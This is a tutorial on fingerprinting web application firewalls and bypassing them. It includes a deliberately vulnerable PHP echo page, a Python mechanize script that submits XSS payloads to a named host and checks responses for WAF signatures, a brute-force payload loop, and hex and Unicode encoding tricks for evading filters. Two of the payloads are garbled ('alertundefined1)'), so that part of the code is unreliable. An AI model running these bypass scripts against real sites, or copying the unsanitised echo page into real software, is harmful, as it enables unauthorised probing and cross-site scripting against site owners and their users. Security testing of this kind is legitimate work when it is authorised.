How to Detect and Bypass Web Application Firewalls with Python

What is a signature‑based firewall?

In a signature‑based firewall you can define custom signatures that match known attack patterns, such as an XSS payload <svg><script>alert`1`<p>. By creating rules that block strings like <script> or alert(*), the WAF filters those requests.

How to determine if a target environment has a WAF?

When a payload is sent to a system protected by a WAF, the HTTP response often contains traces left by the firewall. For example, Mod_Security returns:

HTTP/1.1 406 Not Acceptable
Date: Mon, 10 Jan 2016
Server: nginx
Content-Type: text/html; charset=iso-8859-1
Not Acceptable! ... generated by Mod_Security

Seeing such a response indicates the presence of a WAF.

Step 1: Define HTML document and PHP script

Create a simple HTML form that posts data to waf.php and a PHP page that echoes the submitted value.

<html>
<body>
<form name="waf" action="waf.php" method="post">
Data: <input type="text" name="data"><br>
<input type="submit" value="Submit">
</form>
</body>
</html>

<html>
<body>
Data from the form : <?php echo $_POST["data"]; ?><br>
</body>
</html>

Step 2: Prepare malicious request

Use Python’s mechanize module to automate form submission.

import mechanize as mec
maliciousRequest = mec.Browser()
formName = 'waf'
maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
maliciousRequest.select_form(formName)

Step 3: Prepare payload

Assign the XSS payload to a variable and set the form field.

crossSiteScriptingPayLoad = "<svg><script>alert`1`<p>"
maliciousRequest.form['data'] = crossSiteScriptingPayLoad

Step 4: Submit form and record response

maliciousRequest.submit()
response = maliciousRequest.response().read()
print response

Step 5: Detect specific firewalls

Inspect the response for known strings.

if response.find('WebKnight') >= 0:
    print "Firewall detected: WebKnight"
elif response.find('Mod_Security') >= 0:
    print "Firewall detected: Mod Security"
elif response.find('dotDefender') >= 0:
    print "Firewall detected: Dot Defender"
else:
    print "No Firewall Present"

Brute‑force testing to bypass filters

Iterate over a list of payloads and repeat the detection logic.

listofPayloads = ['<dialog open="" onclose="alertundefined1)">', '<svg><script>prompt(1)<i>', '<a href="javascript:alertundefined1)">CLICK ME</a>']
for payLoads in listofPayloads:
    maliciousRequest = mec.Browser()
    maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
    maliciousRequest.select_form(formName)
    maliciousRequest.form['data'] = payLoads
    maliciousRequest.submit()
    response = maliciousRequest.response().read()
    # same detection logic as above

Encoding HTML tags as Unicode or Hex

If a firewall blocks raw tags, encode them before sending.

listofPayloads = ['<b>','\u003cb\u003e','\x3cb\x3e']
for payLoads in listofPayloads:
    # submit payload as before and print response
    pass

Summary

Understanding how signature‑based WAFs work and how to programmatically test for their presence is essential for security professionals. By crafting custom payloads, analyzing HTTP responses, and employing brute‑force or encoding techniques, testers can identify and potentially bypass firewall protections.